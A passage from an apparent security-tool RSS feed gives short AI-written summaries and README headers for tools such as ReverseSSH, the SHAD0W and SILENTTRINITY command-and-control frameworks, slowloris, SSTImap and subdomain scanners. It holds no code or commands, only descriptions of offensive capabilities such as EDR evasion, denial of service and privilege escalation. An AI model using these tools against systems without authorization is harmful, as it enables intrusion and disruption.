&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ReverseSSH is a lightweight, statically-linked SSH server designed for establishing reverse connections, primarily useful for remote access during CTFs and penetration tests like the OSCP exam. It offers fully interactive shell access, file transfer through SFTP, and supports various port forwarding options, making it a versatile tool for bridging initial access with privilege escalation on target systems running Unix or Windows. Notable features include its compact size of less than 1.5MB and compatibility with both operating systems, enhancing its utility in diverse environments.&lt;/p&gt;</description></item><item><title>reversinglabs-yara-rules</title><link>https://rainmana.github.io/hackyfeed/tools/reversinglabs-reversinglabs-yara-rules/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/reversinglabs-reversinglabs-yara-rules/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The ReversingLabs YARA Rules repository provides a collection of high-quality YARA detection rules designed for threat hunters and incident responders to enhance threat detection capabilities within their environments. These rules emphasize precision and minimal false positives, utilizing clearly defined byte patterns and conditions to target unique malware functionalities. Continuous testing against a vast array of binaries ensures the rules maintain their effectiveness across various security solutions, particularly when integrated with the ReversingLabs Titanium Platform.&lt;/p&gt;</description></item><item><title>RustRedOps</title><link>https://rainmana.github.io/hackyfeed/tools/joaoviictorti-rustredops/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/joaoviictorti-rustredops/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; RustRedOps is a collection of Red Team operation tools developed in Rust, aimed at enhancing the capabilities of security professionals and penetration testers in conducting security assessments and intrusion tests. Notable features include a diverse set of projects focused on techniques such as API hooking, anti-analysis, process enumeration, and various forms of code injection, which collectively facilitate advanced exploitation tactics and malware development. The repository emphasizes efficiency and effectiveness, making it a valuable resource for practitioners in cybersecurity.&lt;/p&gt;</description></item><item><title>rz-ghidra</title><link>https://rainmana.github.io/hackyfeed/tools/rizinorg-rz-ghidra/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rizinorg-rz-ghidra/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; rz-ghidra is an integration of the Ghidra decompiler and Sleigh disassembler specifically designed for the Rizin framework. This plugin allows users to decompile functions, output various formats such as XML and JSON, and customize settings for decompilation in a self-contained manner without requiring the full Ghidra suite. Notable features include seamless integration with Rizin, side-by-side decompilation views, and extensive configurability through various parameters for enhanced user experience.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img width="150" height="150" align="left" style="float: left; margin: 0 10px 0 0;" alt="rz-ghidra logo" src="https://raw.githubusercontent.com/rizinorg/rz-ghidra/master/assets/logo.svg"&gt;
&lt;h1 id="rz-ghidra"&gt;rz-ghidra&lt;/h1&gt;
&lt;!--[![Build Status](https://travis-ci.com/rizinorg/rz-ghidra-dec.svg?token=JDmXp2pDhXxtPErySVHM&amp;branch=master)](https://travis-ci.com/rizinorg/rz-ghidra)--&gt;
&lt;p&gt;This is an integration of the Ghidra decompiler and Sleigh Disassembler for &lt;a href="https://github.com/rizinorg/rizin"&gt;Rizin&lt;/a&gt;.
It is solely based on the decompiler part of Ghidra, which is written entirely in
C++, so Ghidra itself is not required at all and the plugin can be built self-contained.
This project was presented, initially for radare2, at r2con 2019 as part of the Cutter talk: &lt;a href="https://youtu.be/eHtMiezr7l8?t=950"&gt;https://youtu.be/eHtMiezr7l8?t=950&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Scanners-Box</title><link>https://rainmana.github.io/hackyfeed/tools/we5ter-scanners-box/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/we5ter-scanners-box/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Scanners Box is a comprehensive hacker toolkit that consolidates over 335 open-source scanners across various categories, such as subdomain enumeration, SQL injection vulnerability detection, and malware detection. The tool is designed for modular vulnerability assessment and does not include well-known scanning tools like Nmap or Metasploit, focusing instead on specialized scanning capabilities. Notable features include AI-powered autonomous scanners, dynamic and static code analysis, and comprehensive scanning for web applications and IoT devices.&lt;/p&gt;</description></item><item><title>scilla</title><link>https://rainmana.github.io/hackyfeed/tools/edoardottt-scilla/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/edoardottt-scilla/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Scilla is an information gathering tool designed for DNS, subdomains, ports, and directories enumeration. Its primary use case is for penetration testing, providing capabilities for extensive reconnaissance on target domains. Notable features include customizable wordlists for subdomain and directory enumeration, multiple output formats, and ease of installation through various methods such as Homebrew, Snap, and Docker.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://github.com/edoardottt/images/blob/main/scilla/logo.png"&gt;&lt;br&gt;
 &lt;b&gt;🏴‍☠️ Information Gathering tool 🏴‍☠️ - DNS / Subdomains / Ports / Directories enumeration&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;!-- go-report-card --&gt;
 &lt;a href="https://goreportcard.com/report/github.com/edoardottt/scilla"&gt;
 &lt;img src="https://goreportcard.com/badge/github.com/edoardottt/scilla" alt="go-report-card" /&gt;
 &lt;/a&gt;
 &lt;!-- workflows --&gt;
 &lt;a href="https://github.com/edoardottt/scilla/actions"&gt;
 &lt;img src="https://github.com/edoardottt/scilla/actions/workflows/go.yml/badge.svg" alt="workflows" /&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;sub&gt;
 Coded with 💙 by edoardottt
 &lt;/sub&gt;
 &lt;br&gt;
 &lt;!--Tweet button--&gt;
 &lt;a href="https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fedoardottt%2Fscilla%20&amp;text=Information%20Gathering%20tool%21&amp;hashtags=pentesting%2Clinux%2Cgolang%2Cnetwork" target="_blank"&gt;Share on Twitter!
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>ScopeSentry</title><link>https://rainmana.github.io/hackyfeed/tools/autumn-27-scopesentry/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/autumn-27-scopesentry/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Scope Sentry is a versatile cybersecurity tool that provides functionalities such as asset mapping, subdomain enumeration, vulnerability scanning, and information leakage detection. Its primary use case is to facilitate comprehensive security assessments of web assets through a distributed scanning approach, allowing users to configure multiple scanning nodes. Notably, it features a plugin system for extensibility, supports multi-node scanning, and includes components for web monitoring and sensitive data leakage detection.&lt;/p&gt;</description></item><item><title>sectemplates</title><link>https://rainmana.github.io/hackyfeed/tools/securitytemplates-sectemplates/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/securitytemplates-sectemplates/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SecTemplates is a resource repository designed for infosec professionals and engineering teams lacking dedicated security personnel, providing templates for various security programs such as bug bounties, incident response, and vulnerability management. The tool offers structured starting points including checklists, runbooks, and document templates, facilitating the establishment and scaling of security initiatives while maintaining neutrality towards specific vendors. Content is freely available for personal and commercial use, barring resale in other products.&lt;/p&gt;</description></item><item><title>see</title><link>https://rainmana.github.io/hackyfeed/tools/withsecureopensource-see/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/withsecureopensource-see/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Sandboxed Execution Environment (SEE) is a framework designed for automating tests in secure environments utilizing customizable sandboxes through libvirt. It supports various hypervisors, including QEMU and VirtualBox, and enables modular test platforms by allowing plugin integration for enhanced event-based interaction. Ideal for isolating and managing the execution of potentially dangerous or unstable software, SEE facilitates both quick prototyping and production-level testing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="sandboxed-execution-environment"&gt;Sandboxed Execution Environment&lt;/h1&gt;
&lt;p&gt;:Source: &lt;a href="https://github.com/F-Secure/see"&gt;https://github.com/F-Secure/see&lt;/a&gt;
:Documentation: &lt;a href="https://see.readthedocs.io"&gt;https://see.readthedocs.io&lt;/a&gt;
:Download: &lt;a href="https://pypi.python.org/pypi/python-see"&gt;https://pypi.python.org/pypi/python-see&lt;/a&gt;&lt;/p&gt;</description></item><item><title>shad0w</title><link>https://rainmana.github.io/hackyfeed/tools/bats3c-shad0w/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bats3c-shad0w/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SHAD0W is a modular command and control (C2) framework designed for advanced threat operations within mature environments, leveraging techniques to evade endpoint detection and antivirus systems. Built with Python and C, it enables the execution of payloads including .NET assemblies and scripts entirely in memory, while offering features such as HTTPS communication, dynamic process injection, and extensive modularity for tasking beacons. Notable components include built-in privilege escalation exploits, a live web proxy feature, and a robust command-line interface, facilitating customization and effective covert operations.&lt;/p&gt;</description></item><item><title>shannon</title><link>https://rainmana.github.io/hackyfeed/tools/keygraphhq-shannon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/keygraphhq-shannon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Shannon is an autonomous AI penetration testing tool designed for web applications and APIs, capable of performing white-box security assessments through source code analysis and real exploit execution. It identifies potential vulnerabilities such as injection attacks and authentication bypasses, generating reports that include only verified exploits with reproducible proof-of-concept evidence. Key features include fully automated operation, OWASP vulnerability coverage, and integrated security tooling, making it suitable for continuous security testing throughout the software development lifecycle.&lt;/p&gt;</description></item><item><title>shortscan</title><link>https://rainmana.github.io/hackyfeed/tools/bitquark-shortscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bitquark-shortscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Shortscan is an IIS short filename enumeration tool that rapidly identifies files with short filenames on an IIS web server and attempts to discover their corresponding full filenames using a unique checksum matching method. Its notable features include support for custom headers, concurrency settings, and vulnerability checks without full file enumeration, as well as the ability to utilize custom wordlists and generate rainbow tables through an accompanying utility named &lt;code&gt;shortutil&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>SILENTTRINITY</title><link>https://rainmana.github.io/hackyfeed/tools/byt3bl33d3r-silenttrinity/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/byt3bl33d3r-silenttrinity/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SILENTTRINITY is a modern, asynchronous, multiplayer command and control (C2) and post-exploitation framework designed for flexibility and stealth, utilizing Python 3 and the .NET Dynamic Language Runtime. It offers features such as real-time updates via Websockets, ECDHE encrypted communications, and a fully modular architecture allowing operators to customize their C2 channels and modules. The framework leverages embedded third-party .NET scripting languages for dynamic task evaluation, enhancing usability and providing capabilities akin to PowerShell without its direct use.&lt;/p&gt;</description></item><item><title>simplify</title><link>https://rainmana.github.io/hackyfeed/tools/calebfenton-simplify/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/calebfenton-simplify/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Simplify is a generic Android deobfuscator that virtually executes obfuscated apps to enhance code readability while preserving their functional behavior. It operates through a combination of smalivm, which simulates Dalvik method execution, and simplify, which optimizes execution graphs by applying techniques such as constant propagation and dead code removal. Notable features include the ability to handle various obfuscation patterns without renaming methods or classes, and a customizable execution environment to manage optimization parameters.&lt;/p&gt;</description></item><item><title>sipvicious</title><link>https://rainmana.github.io/hackyfeed/tools/enablesecurity-sipvicious/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/enablesecurity-sipvicious/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SIPVicious OSS is a comprehensive toolset designed for auditing SIP-based VoIP systems. Its primary functions include discovering SIP servers, enumerating extensions, and facilitating password cracking through various methods, making it an essential resource for penetration testing of VoIP infrastructures. Notable features include its scanning capabilities (svmap), extension identification (svwar), password cracking (svcrack), session reporting (svreport), and the ability to exploit vulnerabilities in SIP systems (svcrash).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="welcome-to-sipvicious-oss-security-tools"&gt;Welcome to SIPVicious OSS security tools&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://repository-images.githubusercontent.com/32133566/55b41300-12d9-11eb-89d8-58f60930e3fa" alt="SIPVicious mascot"&gt;&lt;/p&gt;</description></item><item><title>skanuvaty</title><link>https://rainmana.github.io/hackyfeed/tools/esc4icescesc-skanuvaty/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/esc4icescesc-skanuvaty/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Skanuvaty is a high-performance DNS/network/port scanning tool that allows users to quickly analyze a domain by discovering its subdomains and resolving their corresponding IPs. Notable features include support for concurrent scans, with the ability to test thousands of subdomains within seconds, and the generation of a comprehensive output file in JSON format for further analysis.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="skanuvaty"&gt;Skanuvaty&lt;/h1&gt;
&lt;p&gt;Dangerously fast dns/network/port scanner, all-in-one.&lt;/p&gt;
&lt;p&gt;&lt;img src="./demo.gif" alt="Demonstration"&gt;&lt;/p&gt;
&lt;p&gt;Start with a domain, and we&amp;rsquo;ll find everything about it.&lt;/p&gt;</description></item><item><title>slowloris</title><link>https://rainmana.github.io/hackyfeed/tools/gkbrk-slowloris/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gkbrk-slowloris/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Slowloris is a Python tool designed to execute HTTP Denial of Service attacks against threaded servers by maintaining numerous open connections through periodic header transmissions, thereby exhausting the server&amp;rsquo;s thread pool. It supports SOCKS5 proxy connections for enhanced anonymity and offers various configuration options such as socket count, random user agents, and logging verbosity to customize the attack parameters. This tool is primarily used for testing the resilience of web servers against DoS attacks.&lt;/p&gt;</description></item><item><title>Sn1per</title><link>https://rainmana.github.io/hackyfeed/tools/1n3-sn1per/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/1n3-sn1per/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Sn1per is an automated penetration testing and attack surface management tool that enhances vulnerability scanning by integrating both commercial and open-source scanners to identify hidden assets and vulnerabilities within an organization&amp;rsquo;s environment. It streamlines the security assessment process through automation, providing deep and continuous security insights suitable for organizations of all sizes. Notable features include its capability to discover and prioritize risks, saving time and resources in the vulnerability management lifecycle.&lt;/p&gt;</description></item><item><title>SpecialK</title><link>https://rainmana.github.io/hackyfeed/tools/specialko-specialk/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/specialko-specialk/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Special K is a versatile tool designed for PC gaming that enhances graphics and performance through code injection. It allows users to modify game behavior by injecting its DLL into applications, supporting both local and global injection methods, which enables a wide range of visual and performance adjustments. Notable features include performance analysis tools, shader and texture modifications, and compatibility with various graphics APIs in both Windows and WINE environments.&lt;/p&gt;</description></item><item><title>Spoofy</title><link>https://rainmana.github.io/hackyfeed/tools/mattkeeley-spoofy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mattkeeley-spoofy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Spoofy is a Python-based tool designed to evaluate the spoofability of domains by analyzing their SPF and DMARC records. It features authoritative lookups with a known DNS fallback, accurate bulk processing, and a customizable spoof logic derived from real-world testing, enabling users to conduct comprehensive assessments of domain security configurations. Additionally, Spoofy offers DKIM selector enumeration via API as an optional feature, making it a valuable resource for cybersecurity assessments.&lt;/p&gt;</description></item><item><title>SSTImap</title><link>https://rainmana.github.io/hackyfeed/tools/vladko312-sstimap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vladko312-sstimap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SSTImap is a penetration testing tool designed to identify and exploit Server-Side Template Injection (SSTI) vulnerabilities in web applications. Its notable features include an interactive mode for enhanced exploitation, support for various programming languages and template engines, and a modular plugin architecture allowing for extensibility. The tool enables advanced exploitation techniques, including the use of generic payloads and evaluation scenarios.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="sstimap"&gt;SSTImap&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/vladko312/sstimap"&gt;&lt;img src="https://img.shields.io/badge/version-1.3-green.svg?logo=github" alt="Version 1.3"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/release/python-3130/"&gt;&lt;img src="https://img.shields.io/badge/python-3.13-blue.svg?logo=python" alt="Python 3.13"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/release/python-360/"&gt;&lt;img src="https://img.shields.io/badge/python-3.6+-yellow.svg?logo=python" alt="Python 3.6"&gt;&lt;/a&gt;
&lt;a href="https://www.gnu.org/licenses/gpl-3.0.txt"&gt;&lt;img src="https://img.shields.io/github/license/vladko312/sstimap?color=green&amp;amp;logo=gnu" alt="GitHub"&gt;&lt;/a&gt;
&lt;a href="https://github.com/vladko312/sstimap/commits/"&gt;&lt;img src="https://img.shields.io/github/last-commit/vladko312/sstimap?color=green&amp;amp;logo=github" alt="GitHub last commit"&gt;&lt;/a&gt;
&lt;a href="https://github.com/vladko312/sstimap"&gt;&lt;img src="https://img.shields.io/maintenance/yes/2026?logo=github" alt="Maintenance"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>SteamKit</title><link>https://rainmana.github.io/hackyfeed/tools/steamre-steamkit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/steamre-steamkit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SteamKit is a .NET library that facilitates interaction with Valve&amp;rsquo;s Steam network, providing a flexible and extensible interface for executing various network operations. Its primary use case is enabling developers to create applications that can leverage Steam&amp;rsquo;s functionalities, such as game management and account handling. Notable features include its distribution as a NuGet package for easy integration, comprehensive XML documentation, and support for .NET 10.0 or higher.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="steamkit"&gt;SteamKit&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/SteamRE/SteamKit/actions/workflows/steamkit2-build.yaml"&gt;&lt;img src="https://github.com/SteamRE/SteamKit/actions/workflows/steamkit2-build.yaml/badge.svg?event=push" alt="Build Status (CI/CD)"&gt;&lt;/a&gt;
&lt;a href="https://www.nuget.org/packages/SteamKit2/"&gt;&lt;img src="https://img.shields.io/nuget/v/SteamKit2.svg" alt="NuGet"&gt;&lt;/a&gt;
&lt;a href="https://codecov.io/gh/SteamRE/SteamKit"&gt;&lt;img src="https://codecov.io/gh/SteamRE/SteamKit/branch/master/graph/badge.svg?token=qkJCxZI6rd" alt="codecov"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>stegcloak</title><link>https://rainmana.github.io/hackyfeed/tools/kurolabs-stegcloak/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kurolabs-stegcloak/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; StegCloak is a JavaScript steganography module that conceals secrets within text by using invisible Unicode characters after compressing and encrypting the data. It is designed for covert communication, allowing users to safely embed strings in various platforms while ensuring cryptographic security through AES-256-CTR encryption and HMAC integrity checks. Key features include high-speed processing, support for hiding file links, and a flexible interface available via API, command-line, and web interface.&lt;/p&gt;</description></item><item><title>stunner</title><link>https://rainmana.github.io/hackyfeed/tools/firefart-stunner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/firefart-stunner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Stunner is a specialized tool designed for testing and exploiting STUN and TURN servers, particularly in the context of videoconferencing and audio chat applications utilizing the TURN protocol. Its primary use case involves identifying misconfigurations in TURN servers, enabling users to establish a SOCKS proxy that routes traffic through these servers into internal networks. Notable features include the ability to enumerate accessible IP addresses, perform detailed server information queries, and set up a local SOCKS server for traffic relaying.&lt;/p&gt;</description></item><item><title>SubDomainizer</title><link>https://rainmana.github.io/hackyfeed/tools/nsonaniya2010-subdomainizer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nsonaniya2010-subdomainizer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SubDomainizer is a reconnaissance tool that identifies hidden subdomains and secrets from specified URLs, web pages, and external JavaScript files. It supports various cloud storage services and can detect S3 buckets and CloudFront URLs, potentially exposing vulnerabilities such as open read/write permissions and subdomain takeover risks. The tool is capable of scanning both individual URLs and lists, with a feature for extracting secrets based on keyword searches and Shannon Entropy calculations, although this is currently in beta phase.&lt;/p&gt;</description></item><item><title>sublert</title><link>https://rainmana.github.io/hackyfeed/tools/yassineaboukir-sublert/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/yassineaboukir-sublert/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Sublert is a Python-based security tool designed for monitoring new subdomains associated with specific organizations by leveraging certificate transparency. It facilitates automated alerts to a Slack workspace for newly identified subdomains and includes functionalities for DNS resolution to verify active subdomains. Key features include periodic monitoring, configuration options for concurrent threads, and logging capabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt; _____ __ __ __
 / ___/__ __/ /_ / /__ _____/ /_
 \__ \/ / / / __ \/ / _ \/ ___/ __/
 ___/ / /_/ / /_/ / / __/ / / /_
 /____/\__,_/_.___/_/\___/_/ \__/

 Author: Yassine Aboukir
 Version: 1.4.7
&lt;/code&gt;&lt;/pre&gt;
&lt;p align="center"&gt;&lt;a href="https://twitter.com/yassineaboukir" target="_blank"&gt;&lt;img src="https://img.shields.io/twitter/follow/yassineaboukir.svg?logo=twitter"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>subscraper</title><link>https://rainmana.github.io/hackyfeed/tools/m8sec-subscraper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m8sec-subscraper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SubScraper is a subdomain enumeration tool designed for penetration testers and bug bounty hunters, enabling the discovery of an organization&amp;rsquo;s attack surface through multiple techniques. It supports DNS resolution, HTTP(S) requests, and CNAME lookups, along with modular support for various data sources and the capability to handle multiple targets. Key features include compatibility with Windows CLI, output formatting in .txt or .csv, and easy extensibility to add new enumeration methods.&lt;/p&gt;</description></item><item><title>SUDO_KILLER</title><link>https://rainmana.github.io/hackyfeed/tools/th3xace-sudo_killer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/th3xace-sudo_killer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SUDO_KILLER is a cybersecurity tool designed for professionals such as pentesters and security auditors, focusing on privilege escalation vulnerabilities in Linux systems related to SUDO configuration and usage. It manually identifies issues such as misconfigurations, risky binaries, and version-based vulnerabilities (CVEs), enabling users to exploit these weaknesses for gaining root-level privileges. The tool provides a detailed checklist of potential local exploits and requires users to perform the exploitation process manually, ensuring a controlled approach to privilege escalation testing.&lt;/p&gt;</description></item><item><title>Sudomy</title><link>https://rainmana.github.io/hackyfeed/tools/screetsec-sudomy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/screetsec-sudomy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Sudomy is a subdomain enumeration and analysis tool designed for advanced automated reconnaissance and OSINT activities. It features both active and passive enumeration methods, utilizing efficient techniques such as DNS brute-forcing via Gobuster and data collection from 22 curated third-party sources. Additional capabilities include subdomain testing, virtual host classification, port scanning, and technology identification, making it a comprehensive solution for penetration testing and bug bounty applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="sudomy"&gt;Sudomy&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/Screetsec/Sudomy/blob/master/LICENSE.md"&gt;&lt;img src="https://img.shields.io/badge/license-MIT-red.svg" alt="License"&gt;&lt;/a&gt; &lt;a href="https://github.com/Screetsec/Sudomy/actions"&gt;&lt;img src="https://action-badges.now.sh/screetsec/sudomy" alt="Build Status"&gt;&lt;/a&gt; &lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/Release-1.2.1-red.svg?maxAge=259200" alt="Version"&gt;&lt;/a&gt; &lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/Supported_OS-Linux-yellow.svg" alt="Build"&gt;&lt;/a&gt; &lt;a href=""&gt;&lt;img src="https://img.shields.io/badge/Supported_WSL-Windows-blue.svg" alt="Build"&gt;&lt;/a&gt; &lt;a href="https://github.com/screetsec/sudomy/issues"&gt;&lt;img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat" alt="Contributions Welcome"&gt;&lt;/a&gt; &lt;a href="https://www.paypal.me/screetsec"&gt;&lt;img src="https://img.shields.io/badge/Donate-PayPal-green.svg" alt="Donate"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>SwiftnessX</title><link>https://rainmana.github.io/hackyfeed/tools/ehrishirajsharma-swiftnessx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ehrishirajsharma-swiftnessx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SwiftnessX is a cross-platform note-taking and target-tracking application designed specifically for penetration testers, built on the ElectronJS framework. It features customizable checklists, including the OWASP Testing Checklist, and allows users to import/export their checklists, enhancing organized documentation throughout the penetration testing process. The tool aims to streamline the workflow for security professionals by providing a unified interface for managing testing notes and methodologies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;br&gt;
 &lt;img src="https://s15.postimg.cc/omhc6tcrv/256px_2x.png" alt="Swiftness" width="100"&gt;&lt;/a&gt;
 &lt;br&gt;
 SwiftnessX v0.2
 &lt;br&gt;
&lt;/h1&gt;
&lt;div align="center"&gt;
&lt;p&gt;&lt;a href="https://forthebadge.com"&gt;&lt;img src="https://forthebadge.com/images/badges/made-with-javascript.svg" alt="forthebadge"&gt;&lt;/a&gt; &lt;a href="https://forthebadge.com"&gt;&lt;img src="https://forthebadge.com/images/badges/winter-is-coming.svg" alt="forthebadge"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>sysmon-modular</title><link>https://rainmana.github.io/hackyfeed/tools/olafhartong-sysmon-modular/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/olafhartong-sysmon-modular/</guid><description>&lt;blockquote&gt;
